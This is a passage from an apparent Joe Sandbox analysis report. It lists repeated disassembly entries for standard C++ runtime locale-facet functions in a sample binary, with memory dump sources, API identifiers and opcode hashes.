                                                                                                                                            • codecvt.LIBCPMT ref: 003023DA
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 003023F1
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302411
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 712880209-1316489359
                                                                                                                                            • Opcode ID: 4e9f20a613cba19c53415a9db42a0904816cfa047df97abf5904df3b1debb1d0
                                                                                                                                            • Instruction ID: e3e7c33c53cc3dda4259892abb6aca33afba0f5b3191ca47df74082e550159fc
                                                                                                                                            • Opcode Fuzzy Hash: 4e9f20a613cba19c53415a9db42a0904816cfa047df97abf5904df3b1debb1d0
                                                                                                                                            • Instruction Fuzzy Hash: D20100399021198BCB0BEB64D865BBEB7A4AF84710F250819E400AF2D1CF749E41CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030242B
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302435
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • collate.LIBCPMT ref: 0030246F
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302486
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003024A6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 1007100420-1316489359
                                                                                                                                            • Opcode ID: a3acd53f5dc7310cdd9f3f054c1c68305bbeab17fd50d65f4e97775cd6af7437
                                                                                                                                            • Instruction ID: 391815c4e720240900ae33c1dda6ba9f8d1e6e7951b556f6fc2ea818cf81cddd
                                                                                                                                            • Opcode Fuzzy Hash: a3acd53f5dc7310cdd9f3f054c1c68305bbeab17fd50d65f4e97775cd6af7437
                                                                                                                                            • Instruction Fuzzy Hash: 9701D2359021199FCB0BEB60D866BBEBBB4AF84720F250409F500AF2D1DF709E41CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 003024C0
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003024CA
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • collate.LIBCPMT ref: 00302504
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030251B
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030253B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 1007100420-1316489359
                                                                                                                                            • Opcode ID: ce485da2c0ec2caf6b67fc64134651dffd041374fca741436c59de23b6dad557
                                                                                                                                            • Instruction ID: b8c7d36eccedc2a6f6c7d6e1490d79770716bd22bb48aa203661e926ad7ad3cc
                                                                                                                                            • Opcode Fuzzy Hash: ce485da2c0ec2caf6b67fc64134651dffd041374fca741436c59de23b6dad557
                                                                                                                                            • Instruction Fuzzy Hash: 66019E35902119DBCB1BEB64D869ABEB7B5AF98720F250809F510AF2D1CF709E418B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302555
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030255F
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • ctype.LIBCPMT ref: 00302599
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 003025B0
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003025D0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 83828444-1316489359
                                                                                                                                            • Opcode ID: 449eb4a5f6f91b5c89a9932aca54cb5e17765d78589901131721072eeb84c4d2
                                                                                                                                            • Instruction ID: 1edee7a02ee447c688ec809a581d72558ab67f103a0d75a4ee87d82db4e6ae9b
                                                                                                                                            • Opcode Fuzzy Hash: 449eb4a5f6f91b5c89a9932aca54cb5e17765d78589901131721072eeb84c4d2
                                                                                                                                            • Instruction Fuzzy Hash: 9C01D2369021199FCB1BEB60C865ABEBBB4BF84710F250819F410AF2D1DF309E45CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 003025EA
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003025F4
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • messages.LIBCPMT ref: 0030262E
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302645
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302665
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2750803064-1316489359
                                                                                                                                            • Opcode ID: 99c5252eadba2423281d88f1755c16feb6be6d6f343983e939ac56557034ae78
                                                                                                                                            • Instruction ID: 3e94722a932a8cd81055a056747437ee4ed67e0f7db4d530c8d35df8653f4fc6
                                                                                                                                            • Opcode Fuzzy Hash: 99c5252eadba2423281d88f1755c16feb6be6d6f343983e939ac56557034ae78
                                                                                                                                            • Instruction Fuzzy Hash: E701D23590111D9BCB0BEB60D869ABEB7B4BF84710F250409F810AF2D1CF709E01CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030267F
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302689
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • messages.LIBCPMT ref: 003026C3
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 003026DA
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003026FA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2750803064-1316489359
                                                                                                                                            • Opcode ID: 1cb0be59f3fe41ebe8f3fa422cfddc7a186878f9e4c9bc0a267b1af74fbfe5db
                                                                                                                                            • Instruction ID: 5d5ed6b9eec231cbed28377cbb971d3c88803719d5a136941cd031f7505aa170
                                                                                                                                            • Opcode Fuzzy Hash: 1cb0be59f3fe41ebe8f3fa422cfddc7a186878f9e4c9bc0a267b1af74fbfe5db
                                                                                                                                            • Instruction Fuzzy Hash: 3301C0359021199FCF1BEB64C865BBEB7B4AF88710F25080AF510AF2D1CF70AE018B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002FD6C4
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FD6CE
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • codecvt.LIBCPMT ref: 002FD708
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FD71F
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FD73F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 712880209-1316489359
                                                                                                                                            • Opcode ID: e48c3e379a0939574698c9ce40bd87647ef6a730150ad93c37c3e9512cc4391b
                                                                                                                                            • Instruction ID: e25f0747a1fbd14991d83d95e68a9a78d7ace6381699bfbb52f16c9f47c57be1
                                                                                                                                            • Opcode Fuzzy Hash: e48c3e379a0939574698c9ce40bd87647ef6a730150ad93c37c3e9512cc4391b
                                                                                                                                            • Instruction Fuzzy Hash: C101C03991011D9BCB1AFB60C851ABEFBA5BF84750F250819E500AF2D2CF70AE018B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030E84A
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030E854
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • collate.LIBCPMT ref: 0030E88E
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030E8A5
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030E8C5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 1007100420-1316489359
                                                                                                                                            • Opcode ID: 84eedc030d1b432e8fe68151f0f7d8267699d3653a96c735a7458809a40830d8
                                                                                                                                            • Instruction ID: 624a34f03341b446e1dbb27de5d2c00fe2258c26937f4cd58544e726a364c90c
                                                                                                                                            • Opcode Fuzzy Hash: 84eedc030d1b432e8fe68151f0f7d8267699d3653a96c735a7458809a40830d8
                                                                                                                                            • Instruction Fuzzy Hash: 3B01C435A011299FCB0BEB64C861ABEB7B4AF84710F254819F400AF2D1CF309E018B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030E8DF
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030E8E9
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • messages.LIBCPMT ref: 0030E923
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030E93A
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030E95A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2750803064-1316489359
                                                                                                                                            • Opcode ID: 726d228271270d3db82a596bf42cd3ac0b17ae8118e8dfd509b2e678ecf0d34f
                                                                                                                                            • Instruction ID: c84c39d679e8ab44b497c61b5d437202b95ff197793f9f330f83ad8327087451
                                                                                                                                            • Opcode Fuzzy Hash: 726d228271270d3db82a596bf42cd3ac0b17ae8118e8dfd509b2e678ecf0d34f
                                                                                                                                            • Instruction Fuzzy Hash: 8F018035A011199BCF1BEBA4D861ABEB7A5BF84710F25090AE514AF2D1CF749E01CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302968
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302972
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 003029AC
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 003029C3
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003029E3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: 6928773505a65cf59c3ac36001616d7798a8f027eb240fe68ed619afaf0a0d7c
                                                                                                                                            • Instruction ID: 260585e8307fa77278aaefb2824b6e8ca7c5d8c2316b858a23fb4d435f705531
                                                                                                                                            • Opcode Fuzzy Hash: 6928773505a65cf59c3ac36001616d7798a8f027eb240fe68ed619afaf0a0d7c
                                                                                                                                            • Instruction Fuzzy Hash: CA01D275902119DBCF0BEB64C866BBEB7B5AF88710F250909F510AF2D2CF709E018B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 003029FD
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302A07
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 00302A41
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302A58
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302A78
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: 9f9e49899abc734ac2a89e1034d5a0b4dd8580bbabe74e3811080a9ddd551e04
                                                                                                                                            • Instruction ID: fb1655c56a8204409fd47e8987b0815467abff498a6a0f4a2b573ec519d6f0b2
                                                                                                                                            • Opcode Fuzzy Hash: 9f9e49899abc734ac2a89e1034d5a0b4dd8580bbabe74e3811080a9ddd551e04
                                                                                                                                            • Instruction Fuzzy Hash: EE01C035901119DBCB1BEB64C865BBFB7A5AF88710F250909F900AF2D1CF309E418B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030EA9E
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030EAA8
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 0030EAE2
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030EAF9
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030EB19
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: 4e0dcb4da84c1e360e34cc02470c11bb7c8397546a3cec105ff9b11291da764c
                                                                                                                                            • Instruction ID: f4100209c9368da5c3fa0c1f17f62eb48419e54faadc53da02d3d40f427c3093
                                                                                                                                            • Opcode Fuzzy Hash: 4e0dcb4da84c1e360e34cc02470c11bb7c8397546a3cec105ff9b11291da764c
                                                                                                                                            • Instruction Fuzzy Hash: 7401D235A01119DBCB1BEB64D861ABEB7B5BF84720F260809F405AF2D2CF309E01CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302A92
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302A9C
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 00302AD6
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302AED
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302B0D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: c0a73cfb9b5cbec362c2528db2a7fc10b0dc235d42f2cc4649b77d2470cee8c3
                                                                                                                                            • Instruction ID: d1b7e60708ecc33ad6bb12c769fff595752a894e50be6e504e5eaeaf7c794c7d
                                                                                                                                            • Opcode Fuzzy Hash: c0a73cfb9b5cbec362c2528db2a7fc10b0dc235d42f2cc4649b77d2470cee8c3
                                                                                                                                            • Instruction Fuzzy Hash: B701C4359012199FCB1BEB64D865BBEB765AF84710F250909E500AF2D2CF709E01CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302B27
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302B31
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 00302B6B
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302B82
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302BA2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: ad59a016b07a7e84a12f87a051914e72d64e9acd701b55cffd1022ddcd1b94cb
                                                                                                                                            • Instruction ID: 255b8d317190ac6feae657a1e082e19af64edec7b52b69bb0711f2d209e00a58
                                                                                                                                            • Opcode Fuzzy Hash: ad59a016b07a7e84a12f87a051914e72d64e9acd701b55cffd1022ddcd1b94cb
                                                                                                                                            • Instruction Fuzzy Hash: 4B01C035901219DBCF1BEB64C865ABEB7B5AF84720F250409E500AF2D1CF309E418B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030EB33
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030EB3D
